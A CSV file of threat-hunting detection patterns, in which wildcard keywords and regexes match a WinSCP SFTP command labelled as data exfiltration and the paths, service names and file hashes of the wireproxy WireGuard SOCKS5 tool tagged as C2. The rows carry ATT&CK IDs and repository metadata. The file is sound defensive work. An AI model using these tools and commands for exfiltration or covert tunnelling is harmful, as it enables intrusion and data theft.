"*winscp.com /command ""open sftp://*",".{0,1000}winscp\.com\s\/command\s\""open\ssftp\:\/\/.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connexion with winscp - legit tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"* wireproxy.service*",".{0,1000}\swireproxy\.service.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/bin/wireproxy*",".{0,1000}\/bin\/wireproxy.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy.conf*",".{0,1000}\/wireproxy\.conf.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy.git*",".{0,1000}\/wireproxy\.git.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy.service*",".{0,1000}\/wireproxy\.service.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy/releases/*",".{0,1000}\/wireproxy\/releases\/.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy_darwin*",".{0,1000}\/wireproxy_darwin.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy_linux_*",".{0,1000}\/wireproxy_linux_.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy_windows*",".{0,1000}\/wireproxy_windows.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy-ci-test*",".{0,1000}\/wireproxy\-ci\-test.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy-master*",".{0,1000}\/wireproxy\-master.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*/wireproxy-udp*",".{0,1000}\/wireproxy\-udp.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*\wireguard.go*",".{0,1000}\\wireguard\.go.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*\wireproxy.service*",".{0,1000}\\wireproxy\.service.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*\wireproxy\*",".{0,1000}\\wireproxy\\.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*\wireproxy-ci-test*",".{0,1000}\\wireproxy\-ci\-test.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*\wireproxy-master*",".{0,1000}\\wireproxy\-master.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*\wireproxy-udp*",".{0,1000}\\wireproxy\-udp.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*009878ba04d0708fd86cc333fcda1e4d9f6a908b95bf28484dcae293bd497201*",".{0,1000}009878ba04d0708fd86cc333fcda1e4d9f6a908b95bf28484dcae293bd497201.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*01553e1a8ac9b5a158f2ff4861643892ac018aefe598c80fb09710c702b70d8c*",".{0,1000}01553e1a8ac9b5a158f2ff4861643892ac018aefe598c80fb09710c702b70d8c.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*01afaf85adb57c17d2d817c34134ffc1804db080b9493cc7e1a45e3288bf7536*",".{0,1000}01afaf85adb57c17d2d817c34134ffc1804db080b9493cc7e1a45e3288bf7536.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*02b26e392e2c9043de39d0c39595b587383170b211b2b86f3499227100192e41*",".{0,1000}02b26e392e2c9043de39d0c39595b587383170b211b2b86f3499227100192e41.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*03e55f4304347ccf6363e5770ac810b3eab5212f734dd9bfc6835eb9423b24d5*",".{0,1000}03e55f4304347ccf6363e5770ac810b3eab5212f734dd9bfc6835eb9423b24d5.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*07311a98f0eb27945a68e1013e666e2ceff69c9241398b7d572086baabb145ee*",".{0,1000}07311a98f0eb27945a68e1013e666e2ceff69c9241398b7d572086baabb145ee.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*0b8f89e4fc750945542db27755503efb9f7bc315991393be3841a5946cc1f1c9*",".{0,1000}0b8f89e4fc750945542db27755503efb9f7bc315991393be3841a5946cc1f1c9.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*1770fedc0630c7c0602f9adaa1ef853a44cd8a889bfd0786b7cdc8aa05f61db6*",".{0,1000}1770fedc0630c7c0602f9adaa1ef853a44cd8a889bfd0786b7cdc8aa05f61db6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*1bcdf25876c01658756741f64fe06654583e539aa3139bdf55ef1324137e148e*",".{0,1000}1bcdf25876c01658756741f64fe06654583e539aa3139bdf55ef1324137e148e.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*1befd6f9e0bec802dc6a4e2a33a85c967bbe3eb6126c1c4d0182f55aba1166a6*",".{0,1000}1befd6f9e0bec802dc6a4e2a33a85c967bbe3eb6126c1c4d0182f55aba1166a6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*1d023cdd6aa17ec552878b1d36e3ce4fb32dc5b9563042a35452b0800c9da124*",".{0,1000}1d023cdd6aa17ec552878b1d36e3ce4fb32dc5b9563042a35452b0800c9da124.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*2146c1335034e53171750fd914adf88e77bb5d9b2a98c61632474a97ae5b016f*",".{0,1000}2146c1335034e53171750fd914adf88e77bb5d9b2a98c61632474a97ae5b016f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*26e454248321c9543371ce81407a9eba31ebe35c58667daaa588965cdee501fe*",".{0,1000}26e454248321c9543371ce81407a9eba31ebe35c58667daaa588965cdee501fe.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*2dfa8caa50560a707a4877e2c9bb40acecaa475d5b792ef78f5309a46038f1ba*",".{0,1000}2dfa8caa50560a707a4877e2c9bb40acecaa475d5b792ef78f5309a46038f1ba.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*2f4e89575f662c72f7c1dcb4f7b5d2bfb356594883e39b0d3b6e17dd941c278f*",".{0,1000}2f4e89575f662c72f7c1dcb4f7b5d2bfb356594883e39b0d3b6e17dd941c278f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*319aa6516c8bef2fc13ae80390fb4a2a99b8ceaaf6ceb462842001b89f22bca1*",".{0,1000}319aa6516c8bef2fc13ae80390fb4a2a99b8ceaaf6ceb462842001b89f22bca1.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*31c085fa529ca13e77e2ad911bf901a0d0c7e21cd27142b09371da30d676ad60*",".{0,1000}31c085fa529ca13e77e2ad911bf901a0d0c7e21cd27142b09371da30d676ad60.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*3204a42f02f8cfed9ba183a2141e16079ad99854b74f9a9e0c6a4831e8b25d8e*",".{0,1000}3204a42f02f8cfed9ba183a2141e16079ad99854b74f9a9e0c6a4831e8b25d8e.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*340318e256a321e87e1a56c948c1d6ab6dcae8f585aacb26b0de457b215b9fbe*",".{0,1000}340318e256a321e87e1a56c948c1d6ab6dcae8f585aacb26b0de457b215b9fbe.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*356eae02a0b678a82174417da439cbdcab3e678197aa8a91824849fb9085fc32*",".{0,1000}356eae02a0b678a82174417da439cbdcab3e678197aa8a91824849fb9085fc32.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*3e6945f3127371b2f2c3f0bdcb2a1c574f92394cc78fbe2144ecefe23f83c983*",".{0,1000}3e6945f3127371b2f2c3f0bdcb2a1c574f92394cc78fbe2144ecefe23f83c983.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*3ee17b78ee6df429959331d016e7a2a64931584c70275c2b72da8b5ff33a3d59*",".{0,1000}3ee17b78ee6df429959331d016e7a2a64931584c70275c2b72da8b5ff33a3d59.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*4019e9601d40a27634c95f10d98a0ee8c6820d2653665d8c718e132e92887814*",".{0,1000}4019e9601d40a27634c95f10d98a0ee8c6820d2653665d8c718e132e92887814.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*40eb2e3dcca0c9f4ed11b3fd96b5824489f60fc0c3caa8f609539dd68ec6f1d5*",".{0,1000}40eb2e3dcca0c9f4ed11b3fd96b5824489f60fc0c3caa8f609539dd68ec6f1d5.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*42f742e6fa63b5b289083c4d17d57065e599754618d56d6a4690199436cdd316*",".{0,1000}42f742e6fa63b5b289083c4d17d57065e599754618d56d6a4690199436cdd316.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*45348fbbfaebb3eeee47d5a96c4254e02e44da4628427fd5da1e5904479b5ce5*",".{0,1000}45348fbbfaebb3eeee47d5a96c4254e02e44da4628427fd5da1e5904479b5ce5.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*47b8e0993b997e7f465802945187521ba8c68592af990215cdf43bef121f8df7*",".{0,1000}47b8e0993b997e7f465802945187521ba8c68592af990215cdf43bef121f8df7.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*47e0483c22d1a0554dfa2b9b51895e866932b4c7269dee4ccc6ad41b3e433abc*",".{0,1000}47e0483c22d1a0554dfa2b9b51895e866932b4c7269dee4ccc6ad41b3e433abc.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*485911ecec88451f4e4272a732526b5024b815630d0d238c452d7faa097f39de*",".{0,1000}485911ecec88451f4e4272a732526b5024b815630d0d238c452d7faa097f39de.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*487a53f4e4f82f5d0789f4cc7b942bd2accddcd2eb296669afbf7d8cf91c421b*",".{0,1000}487a53f4e4f82f5d0789f4cc7b942bd2accddcd2eb296669afbf7d8cf91c421b.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*4acadcd4e74a40bb798d207b3d25b4b5f43cfddc39f9beb78fe5badf428b47a6*",".{0,1000}4acadcd4e74a40bb798d207b3d25b4b5f43cfddc39f9beb78fe5badf428b47a6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*4cd912755e503c2010ab1f436128165f1f899c384bffce49f183c0663ba5da22*",".{0,1000}4cd912755e503c2010ab1f436128165f1f899c384bffce49f183c0663ba5da22.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*4f3bc75be8df0f82b7b79041715ed30cf1a0e658fe2be024825da74c7a8a37c1*",".{0,1000}4f3bc75be8df0f82b7b79041715ed30cf1a0e658fe2be024825da74c7a8a37c1.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*503c58501ddb578dd5ee825bdacde7e5e416210276ec7e6688c8556dfca9ae26*",".{0,1000}503c58501ddb578dd5ee825bdacde7e5e416210276ec7e6688c8556dfca9ae26.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*54b3370eb307a1b726f60f1c1accfb1159feb6e38d6dfda1fe1c6c1d09f79446*",".{0,1000}54b3370eb307a1b726f60f1c1accfb1159feb6e38d6dfda1fe1c6c1d09f79446.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*573af5ccab4dccb4c9eb1f21b5e65d18c0b3a4e2b262c426b6bebc24243904f1*",".{0,1000}573af5ccab4dccb4c9eb1f21b5e65d18c0b3a4e2b262c426b6bebc24243904f1.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*5a1790facd6c8aea4b8c49a0e8d4aaa2f65e367a5d15c8f58014d62a8668b4df*",".{0,1000}5a1790facd6c8aea4b8c49a0e8d4aaa2f65e367a5d15c8f58014d62a8668b4df.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*5c247bb774e29eb43ef20279ae9d8cee98cd0ec4028dd282a09f0bb84f379976*",".{0,1000}5c247bb774e29eb43ef20279ae9d8cee98cd0ec4028dd282a09f0bb84f379976.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*5c4bcebb1782c9cf6c993a076f306555f62b1c8b14e149478ab2358d5a6ca517*",".{0,1000}5c4bcebb1782c9cf6c993a076f306555f62b1c8b14e149478ab2358d5a6ca517.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*5ddc8f41b610fd28ff2a50d363f3085640b3af7278103524bff3075ca2dd993d*",".{0,1000}5ddc8f41b610fd28ff2a50d363f3085640b3af7278103524bff3075ca2dd993d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*5f523d5a29283d1581a3444d2bdfcab0afd70cb8e2991f1931e70f89e6d8b271*",".{0,1000}5f523d5a29283d1581a3444d2bdfcab0afd70cb8e2991f1931e70f89e6d8b271.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*60e6f67d6d09c7986ee9b2683a77eb28d2004ef5c1fa45ef9b9358bca170fc16*",".{0,1000}60e6f67d6d09c7986ee9b2683a77eb28d2004ef5c1fa45ef9b9358bca170fc16.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*642aad896feb5dad407faf2d4c863afcf715eec4f51b21768cd484867c215031*",".{0,1000}642aad896feb5dad407faf2d4c863afcf715eec4f51b21768cd484867c215031.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*651574316f30fcb27c5730435566812d3bdd67c5615c56473ae2ed1e22adabe2*",".{0,1000}651574316f30fcb27c5730435566812d3bdd67c5615c56473ae2ed1e22adabe2.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*65b130644bca2559f84fca5bb2bc22a1ae7d889f01e8905f9799763720fccdb6*",".{0,1000}65b130644bca2559f84fca5bb2bc22a1ae7d889f01e8905f9799763720fccdb6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
